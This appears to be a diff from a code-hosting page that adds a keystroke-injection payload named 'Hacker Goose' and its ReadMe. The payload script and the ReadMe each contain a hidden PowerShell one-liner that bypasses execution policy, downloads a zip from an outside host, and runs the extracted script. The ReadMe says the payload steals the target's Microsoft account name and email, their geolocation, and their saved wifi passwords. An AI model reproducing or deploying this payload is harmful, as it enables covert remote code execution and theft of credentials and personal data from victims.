🤬
  • ■ ■ ■ ■ ■ ■
    Payloads/Flip-EvilGoose/EvilGoose.txt
     1 +REM Title: Hacker Goose
     2 + 
     3 +REM Author: I am Jakoby
     4 + 
     5 +REM Description: A payload that hires a goose to hack your target in real time
     6 + 
     7 +REM Target: Windows 10, 11
     8 + 
     9 +GUI r
     10 +DELAY 500
     11 +STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
     12 +ENTER
     13 + 
  • ■ ■ ■ ■ ■ ■
    Payloads/Flip-EvilGoose/ReadMe.md
     1 +![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
     2 + 
     3 +<!-- TABLE OF CONTENTS -->
     4 +<details>
     5 + <summary>Table of Contents</summary>
     6 + <ol>
     7 + <li><a href="#Description">Description</a></li>
     8 + <li><a href="#getting-started">Getting Started</a></li>
     9 + <li><a href="#Contributing">Contributing</a></li>
     10 + <li><a href="#Version-History">Version History</a></li>
     11 + <li><a href="#Contact">Contact</a></li>
     12 + <li><a href="#Acknowledgments">Acknowledgments</a></li>
     13 + </ol>
     14 +</details>
     15 + 
     16 +# Hacker Goose
     17 + 
     18 +A payload that hires a goose to hack your target in real time
     19 + 
     20 +## Description
     21 + 
     22 +With this payload after is is executed it will wait for a mouse movement to begin
     23 + 
     24 +Afterwards it will walk around your targets screen pulling out personal information about them such as:
     25 + 
     26 +* Full name associated with their microsoft account
     27 +* Email associated with their microsoft account
     28 +* Their exact Geo Location
     29 +* The wifi networks and passwords
     30 + 
     31 +## Getting Started
     32 + 
     33 +### Dependencies
     34 + 
     35 +* Windows 10,11
     36 + 
     37 +<p align="right">(<a href="#top">back to top</a>)</p>
     38 + 
     39 +### Executing program
     40 + 
     41 +* Plug in your device
     42 +* 10 seconds later your goose is owning their system
     43 + 
     44 +```
     45 +powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";iwr -Uri 'https://jakoby.lol/1ae' -O "$D\hg.zip";Expand-Archive "$D\hg.zip" -Des $D -Force;. "$D\hg\main.ps1"
     46 +```
     47 +### Exiting the Payload
     48 + 
     49 +This payload will automatically end after 2 min
     50 + 
     51 +Or if you press `Left Control` + `Right Control` at the same time
     52 + 
     53 +<p align="right">(<a href="#top">back to top</a>)</p>
     54 + 
     55 +## Contributing
     56 + 
     57 +All contributors names will be listed here
     58 + 
     59 +I am Jakoby
     60 + 
     61 +<p align="right">(<a href="#top">back to top</a>)</p>
     62 + 
     63 +## Version History
     64 + 
     65 +* 0.1
     66 + * Initial Release
     67 + 
     68 +<p align="right">(<a href="#top">back to top</a>)</p>
     69 + 
     70 +<!-- CONTACT -->
     71 +## Contact
     72 + 
     73 +<h2 align="center">📱 My Socials 📱</h2>
     74 +<div align=center>
     75 +<table>
     76 + <tr>
     77 + <td align="center" width="96">
     78 + <a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
     79 + <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
     80 + </a>
     81 + <br>YouTube
     82 + </td>
     83 + <td align="center" width="96">
     84 + <a href="https://twitter.com/I_Am_Jakoby">
     85 + <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
     86 + </a>
     87 + <br>Twitter
     88 + </td>
     89 + <td align="center" width="96">
     90 + <a href="https://www.instagram.com/i_am_jakoby/">
     91 + <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
     92 + </a>
     93 + <br>Instagram
     94 + </td>
     95 + <td align="center" width="96">
     96 + <a href="https://discord.gg/MYYER2ZcJF">
     97 + <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
     98 + </a>
     99 + <br>Discord
     100 + </td>
     101 + <td align="center" width="96">
     102 + <a href="https://www.tiktok.com/@i_am_jakoby?lang=en">
     103 + <img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/raw/main/img/tiktok.svg width="48" height="48" alt="Jsonnet" />
     104 + </a>
     105 + <br>TikTok
     106 + </td>
     107 + </tr>
     108 +</table>
     109 +</div>
     110 + 
     111 + 
     112 + 
     113 +<p align="right">(<a href="#top">back to top</a>)</p>
     114 + 
     115 +<!-- ACKNOWLEDGMENTS -->
     116 +## Acknowledgments
     117 + 
     118 +* [Hak5](https://hak5.org/)
     119 +* [MG](https://github.com/OMG-MG)
     120 + 
     121 +<p align="right">(<a href="#top">back to top</a>)</p>
     122 + 
Please wait...
Page is in error, reload to recover